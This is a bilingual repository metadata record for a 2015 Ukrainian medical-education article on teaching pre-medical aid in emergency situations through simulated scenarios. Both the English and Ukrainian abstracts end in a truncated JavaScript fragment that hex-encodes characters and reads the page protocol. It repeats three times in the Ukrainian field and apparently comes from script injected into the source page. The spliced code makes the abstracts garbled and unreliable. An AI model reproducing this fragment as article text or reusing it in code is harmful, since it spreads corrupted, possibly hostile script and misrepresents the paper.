PECULIARITIES OF TEACHING THE DISCIPLINE “PRE-MEDICAL AID IN EXPERIMENTAL SITUATIONS” FOR FOREIGN STUDENTS
ОСОБЛИВОСТІ ВИКЛАДАННЯ ДИСЦИПЛІНИ “ДОМЕДИЧНА ДОПОМОГА В ЕКСТРЕМАЛЬНИХ СИТУАЦІЯХ” ІНОЗЕМНИМ СТУДЕНТАМ
dc.creator | Svan, O. B. | |
dc.date | 2015-10-15 | |
dc.date.accessioned | 2019-08-26T18:53:13Z | |
dc.date.available | 2019-08-26T18:53:13Z | |
dc.identifier | https://ojs.tdmu.edu.ua/index.php/med_osvita/article/view/4978 | |
dc.identifier | 10.11603/me.v0i3.4978 | |
dc.identifier.uri | https://repository.tdmu.edu.ua/handle/123456789/11434 | |
dc.description | Teaching of Pre-medical aid in experimental conditions for foreign students should take place in specialized education laboratories and requires a substantiated logistic supply. Lesson should be held in the form of performance of typical scripts of simulated emergency conditions. Every habit the teacher firstly shows by himself and then propose to do for every student. Evaluation is made on the basis of effectiveness and quality of realization by a student the scripts on emergency condition and test control.// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e | en-US |
dc.description | Викладання домедичної допомоги в екстремальних умовах для студентів-іноземців повинно відбуватися у спеціалізованих навчальних лабораторіях і вимагає ґрунтовного логістичного забезпечення. Заняття повинно проходити у формі виконання типових сценаріїв симульованих невідкладних станів. Кожну навичку викладач спершу показує самостійно, а далі пропонує виконати кожному студенту. Оцінювання відбувається на основі ефективності та якості реалізації студентом сценаріїв з невідкладного стану та тестового контролю. // t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e | uk-UA |
dc.format | application/pdf | |
dc.language | ukr | |
dc.publisher | Ternopil State Medical University | uk-UA |
dc.relation | https://ojs.tdmu.edu.ua/index.php/med_osvita/article/view/4978/4584 | |
dc.rights | Авторське право (c) 2015 Медична освіта | uk-UA |
dc.source | Medical Education; No 3 (2015) | en-US |
dc.source | Медична освіта; № 3 (2015) | uk-UA |
dc.source | 2414-5998 | |
dc.source | 1681-2751 | |
dc.source | 10.11603/me.v0i3 | |
dc.title | PECULIARITIES OF TEACHING THE DISCIPLINE “PRE-MEDICAL AID IN EXPERIMENTAL SITUATIONS” FOR FOREIGN STUDENTS | en-US |
dc.title | ОСОБЛИВОСТІ ВИКЛАДАННЯ ДИСЦИПЛІНИ “ДОМЕДИЧНА ДОПОМОГА В ЕКСТРЕМАЛЬНИХ СИТУАЦІЯХ” ІНОЗЕМНИМ СТУДЕНТАМ | uk-UA |
dc.type | info:eu-repo/semantics/article | |
dc.type | info:eu-repo/semantics/publishedVersion |
Files in this item
Files | Size | Format | View |
---|---|---|---|
There are no files associated with this item. |